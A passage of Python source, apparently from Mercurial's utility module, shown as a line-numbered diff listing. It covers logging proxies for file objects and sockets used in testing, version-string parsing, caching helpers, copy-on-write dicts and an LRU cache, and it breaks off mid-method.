484 484 def close(self, *args, **kwargs):
485 485 return object.__getattribute__(self, r'_observedcall')(
486 486 r'close', *args, **kwargs)
487 487
488 488 def fileno(self, *args, **kwargs):
489 489 return object.__getattribute__(self, r'_observedcall')(
490 490 r'fileno', *args, **kwargs)
491 491
492 492 def flush(self, *args, **kwargs):
493 493 return object.__getattribute__(self, r'_observedcall')(
494 494 r'flush', *args, **kwargs)
495 495
496 496 def isatty(self, *args, **kwargs):
497 497 return object.__getattribute__(self, r'_observedcall')(
498 498 r'isatty', *args, **kwargs)
499 499
500 500 def readable(self, *args, **kwargs):
501 501 return object.__getattribute__(self, r'_observedcall')(
502 502 r'readable', *args, **kwargs)
503 503
504 504 def readline(self, *args, **kwargs):
505 505 return object.__getattribute__(self, r'_observedcall')(
506 506 r'readline', *args, **kwargs)
507 507
508 508 def readlines(self, *args, **kwargs):
509 509 return object.__getattribute__(self, r'_observedcall')(
510 510 r'readlines', *args, **kwargs)
511 511
512 512 def seek(self, *args, **kwargs):
513 513 return object.__getattribute__(self, r'_observedcall')(
514 514 r'seek', *args, **kwargs)
515 515
516 516 def seekable(self, *args, **kwargs):
517 517 return object.__getattribute__(self, r'_observedcall')(
518 518 r'seekable', *args, **kwargs)
519 519
520 520 def tell(self, *args, **kwargs):
521 521 return object.__getattribute__(self, r'_observedcall')(
522 522 r'tell', *args, **kwargs)
523 523
524 524 def truncate(self, *args, **kwargs):
525 525 return object.__getattribute__(self, r'_observedcall')(
526 526 r'truncate', *args, **kwargs)
527 527
528 528 def writable(self, *args, **kwargs):
529 529 return object.__getattribute__(self, r'_observedcall')(
530 530 r'writable', *args, **kwargs)
531 531
532 532 def writelines(self, *args, **kwargs):
533 533 return object.__getattribute__(self, r'_observedcall')(
534 534 r'writelines', *args, **kwargs)
535 535
536 536 def read(self, *args, **kwargs):
537 537 return object.__getattribute__(self, r'_observedcall')(
538 538 r'read', *args, **kwargs)
539 539
540 540 def readall(self, *args, **kwargs):
541 541 return object.__getattribute__(self, r'_observedcall')(
542 542 r'readall', *args, **kwargs)
543 543
544 544 def readinto(self, *args, **kwargs):
545 545 return object.__getattribute__(self, r'_observedcall')(
546 546 r'readinto', *args, **kwargs)
547 547
548 548 def write(self, *args, **kwargs):
549 549 return object.__getattribute__(self, r'_observedcall')(
550 550 r'write', *args, **kwargs)
551 551
552 552 def detach(self, *args, **kwargs):
553 553 return object.__getattribute__(self, r'_observedcall')(
554 554 r'detach', *args, **kwargs)
555 555
556 556 def read1(self, *args, **kwargs):
557 557 return object.__getattribute__(self, r'_observedcall')(
558 558 r'read1', *args, **kwargs)
559 559
560 560 class observedbufferedinputpipe(bufferedinputpipe):
561 561 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
562 562
563 563 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
564 564 bypass ``fileobjectproxy``. Because of this, we need to make
565 565 ``bufferedinputpipe`` aware of these operations.
566 566
567 567 This variation of ``bufferedinputpipe`` can notify observers about
568 568 ``os.read()`` events. It also re-publishes other events, such as
569 569 ``read()`` and ``readline()``.
570 570 """
571 571 def _fillbuffer(self):
572 572 res = super(observedbufferedinputpipe, self)._fillbuffer()
573 573
574 574 fn = getattr(self._input._observer, r'osread', None)
575 575 if fn:
576 576 fn(res, _chunksize)
577 577
578 578 return res
579 579
580 580 # We use different observer methods because the operation isn't
581 581 # performed on the actual file object but on us.
582 582 def read(self, size):
583 583 res = super(observedbufferedinputpipe, self).read(size)
584 584
585 585 fn = getattr(self._input._observer, r'bufferedread', None)
586 586 if fn:
587 587 fn(res, size)
588 588
589 589 return res
590 590
591 591 def readline(self, *args, **kwargs):
592 592 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
593 593
594 594 fn = getattr(self._input._observer, r'bufferedreadline', None)
595 595 if fn:
596 596 fn(res)
597 597
598 598 return res
599 599
600 600 PROXIED_SOCKET_METHODS = {
601 601 r'makefile',
602 602 r'recv',
603 603 r'recvfrom',
604 604 r'recvfrom_into',
605 605 r'recv_into',
606 606 r'send',
607 607 r'sendall',
608 608 r'sendto',
609 609 r'setblocking',
610 610 r'settimeout',
611 611 r'gettimeout',
612 612 r'setsockopt',
613 613 }
614 614
615 615 class socketproxy(object):
616 616 """A proxy around a socket that tells a watcher when events occur.
617 617
618 618 This is like ``fileobjectproxy`` except for sockets.
619 619
620 620 This type is intended to only be used for testing purposes. Think hard
621 621 before using it in important code.
622 622 """
623 623 __slots__ = (
624 624 r'_orig',
625 625 r'_observer',
626 626 )
627 627
628 628 def __init__(self, sock, observer):
629 629 object.__setattr__(self, r'_orig', sock)
630 630 object.__setattr__(self, r'_observer', observer)
631 631
632 632 def __getattribute__(self, name):
633 633 if name in PROXIED_SOCKET_METHODS:
634 634 return object.__getattribute__(self, name)
635 635
636 636 return getattr(object.__getattribute__(self, r'_orig'), name)
637 637
638 638 def __delattr__(self, name):
639 639 return delattr(object.__getattribute__(self, r'_orig'), name)
640 640
641 641 def __setattr__(self, name, value):
642 642 return setattr(object.__getattribute__(self, r'_orig'), name, value)
643 643
644 644 def __nonzero__(self):
645 645 return bool(object.__getattribute__(self, r'_orig'))
646 646
647 647 __bool__ = __nonzero__
648 648
649 649 def _observedcall(self, name, *args, **kwargs):
650 650 # Call the original object.
651 651 orig = object.__getattribute__(self, r'_orig')
652 652 res = getattr(orig, name)(*args, **kwargs)
653 653
654 654 # Call a method on the observer of the same name with arguments
655 655 # so it can react, log, etc.
656 656 observer = object.__getattribute__(self, r'_observer')
657 657 fn = getattr(observer, name, None)
658 658 if fn:
659 659 fn(res, *args, **kwargs)
660 660
661 661 return res
662 662
663 663 def makefile(self, *args, **kwargs):
664 664 res = object.__getattribute__(self, r'_observedcall')(
665 665 r'makefile', *args, **kwargs)
666 666
667 667 # The file object may be used for I/O. So we turn it into a
668 668 # proxy using our observer.
669 669 observer = object.__getattribute__(self, r'_observer')
670 670 return makeloggingfileobject(observer.fh, res, observer.name,
671 671 reads=observer.reads,
672 672 writes=observer.writes,
673 673 logdata=observer.logdata,
674 674 logdataapis=observer.logdataapis)
675 675
676 676 def recv(self, *args, **kwargs):
677 677 return object.__getattribute__(self, r'_observedcall')(
678 678 r'recv', *args, **kwargs)
679 679
680 680 def recvfrom(self, *args, **kwargs):
681 681 return object.__getattribute__(self, r'_observedcall')(
682 682 r'recvfrom', *args, **kwargs)
683 683
684 684 def recvfrom_into(self, *args, **kwargs):
685 685 return object.__getattribute__(self, r'_observedcall')(
686 686 r'recvfrom_into', *args, **kwargs)
687 687
688 688 def recv_into(self, *args, **kwargs):
689 689 return object.__getattribute__(self, r'_observedcall')(
690 690 r'recv_info', *args, **kwargs)
691 691
692 692 def send(self, *args, **kwargs):
693 693 return object.__getattribute__(self, r'_observedcall')(
694 694 r'send', *args, **kwargs)
695 695
696 696 def sendall(self, *args, **kwargs):
697 697 return object.__getattribute__(self, r'_observedcall')(
698 698 r'sendall', *args, **kwargs)
699 699
700 700 def sendto(self, *args, **kwargs):
701 701 return object.__getattribute__(self, r'_observedcall')(
702 702 r'sendto', *args, **kwargs)
703 703
704 704 def setblocking(self, *args, **kwargs):
705 705 return object.__getattribute__(self, r'_observedcall')(
706 706 r'setblocking', *args, **kwargs)
707 707
708 708 def settimeout(self, *args, **kwargs):
709 709 return object.__getattribute__(self, r'_observedcall')(
710 710 r'settimeout', *args, **kwargs)
711 711
712 712 def gettimeout(self, *args, **kwargs):
713 713 return object.__getattribute__(self, r'_observedcall')(
714 714 r'gettimeout', *args, **kwargs)
715 715
716 716 def setsockopt(self, *args, **kwargs):
717 717 return object.__getattribute__(self, r'_observedcall')(
718 718 r'setsockopt', *args, **kwargs)
719 719
720 720 class baseproxyobserver(object):
721 721 def _writedata(self, data):
722 722 if not self.logdata:
723 723 if self.logdataapis:
724 724 self.fh.write('\n')
725 725 self.fh.flush()
726 726 return
727 727
728 728 # Simple case writes all data on a single line.
729 729 if b'\n' not in data:
730 730 if self.logdataapis:
731 731 self.fh.write(': %s\n' % stringutil.escapestr(data))
732 732 else:
733 733 self.fh.write('%s> %s\n'
734 734 % (self.name, stringutil.escapestr(data)))
735 735 self.fh.flush()
736 736 return
737 737
738 738 # Data with newlines is written to multiple lines.
739 739 if self.logdataapis:
740 740 self.fh.write(':\n')
741 741
742 742 lines = data.splitlines(True)
743 743 for line in lines:
744 744 self.fh.write('%s> %s\n'
745 745 % (self.name, stringutil.escapestr(line)))
746 746 self.fh.flush()
747 747
748 748 class fileobjectobserver(baseproxyobserver):
749 749 """Logs file object activity."""
750 750 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
751 751 logdataapis=True):
752 752 self.fh = fh
753 753 self.name = name
754 754 self.logdata = logdata
755 755 self.logdataapis = logdataapis
756 756 self.reads = reads
757 757 self.writes = writes
758 758
759 759 def read(self, res, size=-1):
760 760 if not self.reads:
761 761 return
762 762 # Python 3 can return None from reads at EOF instead of empty strings.
763 763 if res is None:
764 764 res = ''
765 765
766 766 if size == -1 and res == '':
767 767 # Suppress pointless read(-1) calls that return
768 768 # nothing. These happen _a lot_ on Python 3, and there
769 769 # doesn't seem to be a better workaround to have matching
770 770 # Python 2 and 3 behavior. :(
771 771 return
772 772
773 773 if self.logdataapis:
774 774 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
775 775
776 776 self._writedata(res)
777 777
778 778 def readline(self, res, limit=-1):
779 779 if not self.reads:
780 780 return
781 781
782 782 if self.logdataapis:
783 783 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
784 784
785 785 self._writedata(res)
786 786
787 787 def readinto(self, res, dest):
788 788 if not self.reads:
789 789 return
790 790
791 791 if self.logdataapis:
792 792 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
793 793 res))
794 794
795 795 data = dest[0:res] if res is not None else b''
796 796
797 797 # _writedata() uses "in" operator and is confused by memoryview because
798 798 # characters are ints on Python 3.
799 799 if isinstance(data, memoryview):
800 800 data = data.tobytes()
801 801
802 802 self._writedata(data)
803 803
804 804 def write(self, res, data):
805 805 if not self.writes:
806 806 return
807 807
808 808 # Python 2 returns None from some write() calls. Python 3 (reasonably)
809 809 # returns the integer bytes written.
810 810 if res is None and data:
811 811 res = len(data)
812 812
813 813 if self.logdataapis:
814 814 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
815 815
816 816 self._writedata(data)
817 817
818 818 def flush(self, res):
819 819 if not self.writes:
820 820 return
821 821
822 822 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
823 823
824 824 # For observedbufferedinputpipe.
825 825 def bufferedread(self, res, size):
826 826 if not self.reads:
827 827 return
828 828
829 829 if self.logdataapis:
830 830 self.fh.write('%s> bufferedread(%d) -> %d' % (
831 831 self.name, size, len(res)))
832 832
833 833 self._writedata(res)
834 834
835 835 def bufferedreadline(self, res):
836 836 if not self.reads:
837 837 return
838 838
839 839 if self.logdataapis:
840 840 self.fh.write('%s> bufferedreadline() -> %d' % (
841 841 self.name, len(res)))
842 842
843 843 self._writedata(res)
844 844
845 845 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
846 846 logdata=False, logdataapis=True):
847 847 """Turn a file object into a logging file object."""
848 848
849 849 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
850 850 logdata=logdata, logdataapis=logdataapis)
851 851 return fileobjectproxy(fh, observer)
852 852
853 853 class socketobserver(baseproxyobserver):
854 854 """Logs socket activity."""
855 855 def __init__(self, fh, name, reads=True, writes=True, states=True,
856 856 logdata=False, logdataapis=True):
857 857 self.fh = fh
858 858 self.name = name
859 859 self.reads = reads
860 860 self.writes = writes
861 861 self.states = states
862 862 self.logdata = logdata
863 863 self.logdataapis = logdataapis
864 864
865 865 def makefile(self, res, mode=None, bufsize=None):
866 866 if not self.states:
867 867 return
868 868
869 869 self.fh.write('%s> makefile(%r, %r)\n' % (
870 870 self.name, mode, bufsize))
871 871
872 872 def recv(self, res, size, flags=0):
873 873 if not self.reads:
874 874 return
875 875
876 876 if self.logdataapis:
877 877 self.fh.write('%s> recv(%d, %d) -> %d' % (
878 878 self.name, size, flags, len(res)))
879 879 self._writedata(res)
880 880
881 881 def recvfrom(self, res, size, flags=0):
882 882 if not self.reads:
883 883 return
884 884
885 885 if self.logdataapis:
886 886 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
887 887 self.name, size, flags, len(res[0])))
888 888
889 889 self._writedata(res[0])
890 890
891 891 def recvfrom_into(self, res, buf, size, flags=0):
892 892 if not self.reads:
893 893 return
894 894
895 895 if self.logdataapis:
896 896 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
897 897 self.name, size, flags, res[0]))
898 898
899 899 self._writedata(buf[0:res[0]])
900 900
901 901 def recv_into(self, res, buf, size=0, flags=0):
902 902 if not self.reads:
903 903 return
904 904
905 905 if self.logdataapis:
906 906 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
907 907 self.name, size, flags, res))
908 908
909 909 self._writedata(buf[0:res])
910 910
911 911 def send(self, res, data, flags=0):
912 912 if not self.writes:
913 913 return
914 914
915 915 self.fh.write('%s> send(%d, %d) -> %d' % (
916 916 self.name, len(data), flags, len(res)))
917 917 self._writedata(data)
918 918
919 919 def sendall(self, res, data, flags=0):
920 920 if not self.writes:
921 921 return
922 922
923 923 if self.logdataapis:
924 924 # Returns None on success. So don't bother reporting return value.
925 925 self.fh.write('%s> sendall(%d, %d)' % (
926 926 self.name, len(data), flags))
927 927
928 928 self._writedata(data)
929 929
930 930 def sendto(self, res, data, flagsoraddress, address=None):
931 931 if not self.writes:
932 932 return
933 933
934 934 if address:
935 935 flags = flagsoraddress
936 936 else:
937 937 flags = 0
938 938
939 939 if self.logdataapis:
940 940 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
941 941 self.name, len(data), flags, address, res))
942 942
943 943 self._writedata(data)
944 944
945 945 def setblocking(self, res, flag):
946 946 if not self.states:
947 947 return
948 948
949 949 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
950 950
951 951 def settimeout(self, res, value):
952 952 if not self.states:
953 953 return
954 954
955 955 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
956 956
957 957 def gettimeout(self, res):
958 958 if not self.states:
959 959 return
960 960
961 961 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
962 962
963 963 def setsockopt(self, res, level, optname, value):
964 964 if not self.states:
965 965 return
966 966
967 967 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
968 968 self.name, level, optname, value, res))
969 969
970 970 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
971 971 logdata=False, logdataapis=True):
972 972 """Turn a socket into a logging socket."""
973 973
974 974 observer = socketobserver(logh, name, reads=reads, writes=writes,
975 975 states=states, logdata=logdata,
976 976 logdataapis=logdataapis)
977 977 return socketproxy(fh, observer)
978 978
979 979 def version():
980 980 """Return version information if available."""
981 981 try:
982 982 from . import __version__
983 983 return __version__.version
984 984 except ImportError:
985 985 return 'unknown'
986 986
987 987 def versiontuple(v=None, n=4):
988 988 """Parses a Mercurial version string into an N-tuple.
989 989
990 990 The version string to be parsed is specified with the ``v`` argument.
991 991 If it isn't defined, the current Mercurial version string will be parsed.
992 992
993 993 ``n`` can be 2, 3, or 4. Here is how some version strings map to
994 994 returned values:
995 995
996 996 >>> v = b'3.6.1+190-df9b73d2d444'
997 997 >>> versiontuple(v, 2)
998 998 (3, 6)
999 999 >>> versiontuple(v, 3)
1000 1000 (3, 6, 1)
1001 1001 >>> versiontuple(v, 4)
1002 1002 (3, 6, 1, '190-df9b73d2d444')
1003 1003
1004 1004 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1005 1005 (3, 6, 1, '190-df9b73d2d444+20151118')
1006 1006
1007 1007 >>> v = b'3.6'
1008 1008 >>> versiontuple(v, 2)
1009 1009 (3, 6)
1010 1010 >>> versiontuple(v, 3)
1011 1011 (3, 6, None)
1012 1012 >>> versiontuple(v, 4)
1013 1013 (3, 6, None, None)
1014 1014
1015 1015 >>> v = b'3.9-rc'
1016 1016 >>> versiontuple(v, 2)
1017 1017 (3, 9)
1018 1018 >>> versiontuple(v, 3)
1019 1019 (3, 9, None)
1020 1020 >>> versiontuple(v, 4)
1021 1021 (3, 9, None, 'rc')
1022 1022
1023 1023 >>> v = b'3.9-rc+2-02a8fea4289b'
1024 1024 >>> versiontuple(v, 2)
1025 1025 (3, 9)
1026 1026 >>> versiontuple(v, 3)
1027 1027 (3, 9, None)
1028 1028 >>> versiontuple(v, 4)
1029 1029 (3, 9, None, 'rc+2-02a8fea4289b')
1030 1030
1031 1031 >>> versiontuple(b'4.6rc0')
1032 1032 (4, 6, None, 'rc0')
1033 1033 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1034 1034 (4, 6, None, 'rc0+12-425d55e54f98')
1035 1035 >>> versiontuple(b'.1.2.3')
1036 1036 (None, None, None, '.1.2.3')
1037 1037 >>> versiontuple(b'12.34..5')
1038 1038 (12, 34, None, '..5')
1039 1039 >>> versiontuple(b'1.2.3.4.5.6')
1040 1040 (1, 2, 3, '.4.5.6')
1041 1041 """
1042 1042 if not v:
1043 1043 v = version()
1044 1044 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1045 1045 if not m:
1046 1046 vparts, extra = '', v
1047 1047 elif m.group(2):
1048 1048 vparts, extra = m.groups()
1049 1049 else:
1050 1050 vparts, extra = m.group(1), None
1051 1051
1052 1052 vints = []
1053 1053 for i in vparts.split('.'):
1054 1054 try:
1055 1055 vints.append(int(i))
1056 1056 except ValueError:
1057 1057 break
1058 1058 # (3, 6) -> (3, 6, None)
1059 1059 while len(vints) < 3:
1060 1060 vints.append(None)
1061 1061
1062 1062 if n == 2:
1063 1063 return (vints[0], vints[1])
1064 1064 if n == 3:
1065 1065 return (vints[0], vints[1], vints[2])
1066 1066 if n == 4:
1067 1067 return (vints[0], vints[1], vints[2], extra)
1068 1068
1069 1069 def cachefunc(func):
1070 1070 '''cache the result of function calls'''
1071 1071 # XXX doesn't handle keywords args
1072 1072 if func.__code__.co_argcount == 0:
1073 1073 cache = []
1074 1074 def f():
1075 1075 if len(cache) == 0:
1076 1076 cache.append(func())
1077 1077 return cache[0]
1078 1078 return f
1079 1079 cache = {}
1080 1080 if func.__code__.co_argcount == 1:
1081 1081 # we gain a small amount of time because
1082 1082 # we don't need to pack/unpack the list
1083 1083 def f(arg):
1084 1084 if arg not in cache:
1085 1085 cache[arg] = func(arg)
1086 1086 return cache[arg]
1087 1087 else:
1088 1088 def f(*args):
1089 1089 if args not in cache:
1090 1090 cache[args] = func(*args)
1091 1091 return cache[args]
1092 1092
1093 1093 return f
1094 1094
1095 1095 class cow(object):
1096 1096 """helper class to make copy-on-write easier
1097 1097
1098 1098 Call preparewrite before doing any writes.
1099 1099 """
1100 1100
1101 1101 def preparewrite(self):
1102 1102 """call this before writes, return self or a copied new object"""
1103 1103 if getattr(self, '_copied', 0):
1104 1104 self._copied -= 1
1105 1105 return self.__class__(self)
1106 1106 return self
1107 1107
1108 1108 def copy(self):
1109 1109 """always do a cheap copy"""
1110 1110 self._copied = getattr(self, '_copied', 0) + 1
1111 1111 return self
1112 1112
1113 1113 class sortdict(collections.OrderedDict):
1114 1114 '''a simple sorted dictionary
1115 1115
1116 1116 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1117 1117 >>> d2 = d1.copy()
1118 1118 >>> d2
1119 1119 sortdict([('a', 0), ('b', 1)])
1120 1120 >>> d2.update([(b'a', 2)])
1121 1121 >>> list(d2.keys()) # should still be in last-set order
1122 1122 ['b', 'a']
1123 1123 '''
1124 1124
1125 1125 def __setitem__(self, key, value):
1126 1126 if key in self:
1127 1127 del self[key]
1128 1128 super(sortdict, self).__setitem__(key, value)
1129 1129
1130 1130 if pycompat.ispypy:
1131 1131 # __setitem__() isn't called as of PyPy 5.8.0
1132 1132 def update(self, src):
1133 1133 if isinstance(src, dict):
1134 1134 src = src.iteritems()
1135 1135 for k, v in src:
1136 1136 self[k] = v
1137 1137
1138 1138 class cowdict(cow, dict):
1139 1139 """copy-on-write dict
1140 1140
1141 1141 Be sure to call d = d.preparewrite() before writing to d.
1142 1142
1143 1143 >>> a = cowdict()
1144 1144 >>> a is a.preparewrite()
1145 1145 True
1146 1146 >>> b = a.copy()
1147 1147 >>> b is a
1148 1148 True
1149 1149 >>> c = b.copy()
1150 1150 >>> c is a
1151 1151 True
1152 1152 >>> a = a.preparewrite()
1153 1153 >>> b is a
1154 1154 False
1155 1155 >>> a is a.preparewrite()
1156 1156 True
1157 1157 >>> c = c.preparewrite()
1158 1158 >>> b is c
1159 1159 False
1160 1160 >>> b is b.preparewrite()
1161 1161 True
1162 1162 """
1163 1163
1164 1164 class cowsortdict(cow, sortdict):
1165 1165 """copy-on-write sortdict
1166 1166
1167 1167 Be sure to call d = d.preparewrite() before writing to d.
1168 1168 """
1169 1169
1170 1170 class transactional(object):
1171 1171 """Base class for making a transactional type into a context manager."""
1172 1172 __metaclass__ = abc.ABCMeta
1173 1173
1174 1174 @abc.abstractmethod
1175 1175 def close(self):
1176 1176 """Successfully closes the transaction."""
1177 1177
1178 1178 @abc.abstractmethod
1179 1179 def release(self):
1180 1180 """Marks the end of the transaction.
1181 1181
1182 1182 If the transaction has not been closed, it will be aborted.
1183 1183 """
1184 1184
1185 1185 def __enter__(self):
1186 1186 return self
1187 1187
1188 1188 def __exit__(self, exc_type, exc_val, exc_tb):
1189 1189 try:
1190 1190 if exc_type is None:
1191 1191 self.close()
1192 1192 finally:
1193 1193 self.release()
1194 1194
1195 1195 @contextlib.contextmanager
1196 1196 def acceptintervention(tr=None):
1197 1197 """A context manager that closes the transaction on InterventionRequired
1198 1198
1199 1199 If no transaction was provided, this simply runs the body and returns
1200 1200 """
1201 1201 if not tr:
1202 1202 yield
1203 1203 return
1204 1204 try:
1205 1205 yield
1206 1206 tr.close()
1207 1207 except error.InterventionRequired:
1208 1208 tr.close()
1209 1209 raise
1210 1210 finally:
1211 1211 tr.release()
1212 1212
1213 1213 @contextlib.contextmanager
1214 1214 def nullcontextmanager():
1215 1215 yield
1216 1216
1217 1217 class _lrucachenode(object):
1218 1218 """A node in a doubly linked list.
1219 1219
1220 1220 Holds a reference to nodes on either side as well as a key-value
1221 1221 pair for the dictionary entry.
1222 1222 """
1223 1223 __slots__ = (r'next', r'prev', r'key', r'value', r'cost')
1224 1224
1225 1225 def __init__(self):
1226 1226 self.next = None
1227 1227 self.prev = None
1228 1228
1229 1229 self.key = _notset
1230 1230 self.value = None
1231 1231 self.cost = 0
1232 1232
1233 1233 def markempty(self):
1234 1234 """Mark the node as emptied."""
1235 1235 self.key = _notset
1236 1236 self.value = None
1237 1237 self.cost = 0
1238 1238
1239 1239 class lrucachedict(object):
1240 1240 """Dict that caches most recent accesses and sets.
1241 1241
1242 1242 The dict consists of an actual backing dict - indexed by original
1243 1243 key - and a doubly linked circular list defining the order of entries in
1244 1244 the cache.
1245 1245
1246 1246 The head node is the newest entry in the cache. If the cache is full,
1247 1247 we recycle head.prev and make it the new head. Cache accesses result in
1248 1248 the node being moved to before the existing head and being marked as the
1249 1249 new head node.
1250 1250
1251 1251 Items in the cache can be inserted with an optional "cost" value. This is
1252 1252 simply an integer that is specified by the caller. The cache can be queried
1253 1253 for the total cost of all items presently in the cache.
1254 1254
1255 1255 The cache can also define a maximum cost. If a cache insertion would
1256 1256 cause the total cost of the cache to go beyond the maximum cost limit,
1257 1257 nodes will be evicted to make room for the new code. This can be used
1258 1258 to e.g. set a max memory limit and associate an estimated bytes size
1259 1259 cost to each item in the cache. By default, no maximum cost is enforced.
1260 1260 """
1261 1261 def __init__(self, max, maxcost=0):
1262 1262 self._cache = {}
1263 1263
1264 1264 self._head = head = _lrucachenode()
1265 1265 head.prev = head
1266 1266 head.next = head
1267 1267 self._size = 1
1268 1268 self.capacity = max
1269 1269 self.totalcost = 0
1270 1270 self.maxcost = maxcost
1271 1271
1272 1272 def __len__(self):
1273 1273 return len(self._cache)
1274 1274
1275 1275 def __contains__(self, k):
1276 1276 return k in self._cache
1277 1277
1278 1278 def __iter__(self):
1279 1279 # We don't have to iterate in cache order, but why not.
1280 1280 n = self._head
1281 1281 for i in range(len(self._cache)):
1282 1282 yield n.key
1283 1283 n = n.next
1284 1284
1285 1285 def __getitem__(self, k):
1286 1286 node = self._cache[k]
1287 1287 self._movetohead(node)
1288 1288 return node.value
1289 1289
1290 1290 def insert(self, k, v, cost=0):
1291 1291 """Insert a new item in the cache with optional cost value."""
1292 1292 node = self._cache.get(k)
1293 1293 # Replace existing value and mark as newest.
1294 1294 if node is not None:
1295 1295 self.totalcost -= node.cost
1296 1296 node.value = v
1297 1297 node.cost = cost
1298 1298 self.totalcost += cost
1299 1299 self._movetohead(node)
1300 1300
1301 1301 if self.maxcost:
1302 1302 self._enforcecostlimit()
1303 1303
1304 1304 return
1305 1305
1306 1306 if self._size < self.capacity:
1307 1307 node = self._addcapacity()
1308 1308 else:
1309 1309 # Grab the last/oldest item.
1310 1310 node = self._head.prev
1311 1311
1312 1312 # At capacity. Kill the old entry.
1313 1313 if node.key is not _notset:
1314 1314 self.totalcost -= node.cost
1315 1315 del self._cache[node.key]
1316 1316
1317 1317 node.key = k
1318 1318 node.value = v
1319 1319 node.cost = cost
1320 1320 self.totalcost += cost
1321 1321 self._cache[k] = node
1322 1322 # And mark it as newest entry. No need to adjust order since it
1323 1323 # is already self._head.prev.
1324 1324 self._head = node
1325 1325
1326 1326 if self.maxcost:
1327 1327 self._enforcecostlimit()
1328 1328
1329 1329 def __setitem__(self, k, v):
1330 1330 self.insert(k, v)
1331 1331
1332 1332 def __delitem__(self, k):
1333 1333 self.pop(k)
1334 1334
1335 1335 def pop(self, k, default=_notset):
1336 1336 try:
1337 1337 node = self._cache.pop(k)
1338 1338 except KeyError:
1339 1339 if default is _notset:
1340 1340 raise
1341 1341 return default
1342 1342 value = node.value
1343 1343 self.totalcost -= node.cost
1344 1344 node.markempty()
1345 1345
1346 1346 # Temporarily mark as newest item before re-adjusting head to make
1347 1347 # this node the oldest item.
1348 1348 self._movetohead(node)
1349 1349 self._head = node.next
1350 1350
1351 1351 return value
1352 1352
1353 1353 # Additional dict methods.
1354 1354
1355 1355 def get(self, k, default=None):
1356 1356 try:
1357 1357 return self.__getitem__(k)
1358 1358 except KeyError:
1359 1359 return default
1360 1360
1361 1361 def peek(self, k, default=_notset):
1362 1362 """Get the specified item without moving it to the head
1363 1363
1364 1364 Unlike get(), this doesn't mutate the internal state. But be aware
1365 1365 that it doesn't mean peek() is thread safe.
1366 1366 """
1367 1367 try:
1368 1368 node = self._cache[k]
1369 1369 return node.value
1370 1370 except KeyError:
1371 1371 if default is _notset:
1372 1372 raise
1373 1373 return default
1374 1374
1375 1375 def clear(self):
1376 1376 n = self._head
1377 1377 while n.key is not _notset:
1378 1378 self.totalcost -= n.cost
1379 1379 n.markempty()
1380 1380 n = n.next
1381 1381
1382 1382 self._cache.clear()
1383 1383
1384 1384 def copy(self, capacity=None, maxcost=0):
1385 1385 """Create a new cache as a copy of the current one.
1386 1386
1387 1387 By default, the new cache has the same capacity as the existing one.
1388 1388 But, the cache capacity can be changed as part of performing the
1389 1389 copy.
1390 1390
1391 1391 Items in the copy have an insertion/access order matching this
1392 1392 instance.
1393 1393 """
1394 1394
1395 1395 capacity = capacity or self.capacity
1396 1396 maxcost = maxcost or self.maxcost
1397 1397 result = lrucachedict(capacity, maxcost=maxcost)
1398 1398
1399 1399 # We copy entries by iterating in oldest-to-newest order so the copy
1400 1400 # has the correct ordering.
1401 1401
1402 1402 # Find the first non-empty entry.
1403 1403 n = self._head.prev
1404 1404 while n.key is _notset and n is not self._head:
1405 1405 n = n.prev
1406 1406
1407 1407 # We could potentially skip the first N items when decreasing capacity.
1408 1408 # But let's keep it simple unless it is a performance problem.
1409 1409 for i in range(len(self._cache)):
1410 1410 result.insert(n.key, n.value, cost=n.cost)
1411 1411 n = n.prev
1412 1412
1413 1413 return result
1414 1414
1415 1415 def popoldest(self):
1416 1416 """Remove the oldest item from the cache.
1417 1417
1418 1418 Returns the (key, value) describing the removed cache entry.
1419 1419 """
1420 1420 if not self._cache:
1421 1421 return
1422 1422
1423 1423 # Walk the linked list backwards starting at tail node until we hit
1424 1424 # a non-empty node.
1425 1425 n = self._head.prev
1426 1426 while n.key is _notset:
1427 1427 n = n.prev
1428 1428
1429 1429 key, value = n.key, n.value
1430 1430
1431 1431 # And remove it from the cache and mark it as empty.
1432 1432 del self._cache[n.key]
1433 1433 self.totalcost -= n.cost
1434 1434 n.markempty()
1435 1435
1436 1436 return key, value
1437 1437
1438 1438 def _movetohead(self, node):
1439 1439 """Mark a node as the newest, making it the new head.
1440 1440
1441 1441 When a node is accessed, it becomes the freshest entry in the LRU
1442 1442 list, which is denoted by self._head.
1443 1443
1444 1444 Visually, let's make ``N`` the new head node (* denotes head):
1445 1445
1446 1446 previous/oldest <-> head <-> next/next newest
1447 1447
1448 1448 ----<->--- A* ---<->-----
1449 1449 | |
1450 1450 E <-> D <-> N <-> C <-> B
1451 1451
1452 1452 To:
1453 1453
1454 1454 ----<->--- N* ---<->-----
1455 1455 | |
1456 1456 E <-> D <-> C <-> B <-> A
1457 1457
1458 1458 This requires the following moves:
1459 1459
1460 1460 C.next = D (node.prev.next = node.next)
1461 1461 D.prev = C (node.next.prev = node.prev)
1462 1462 E.next = N (head.prev.next = node)
1463 1463 N.prev = E (node.prev = head.prev)
1464 1464 N.next = A (node.next = head)
1465 1465 A.prev = N (head.prev = node)
1466 1466 """
1467 1467 head = self._head
1468 1468 # C.next = D
1469 1469 node.prev.next = node.next
1470 1470 # D.prev = C
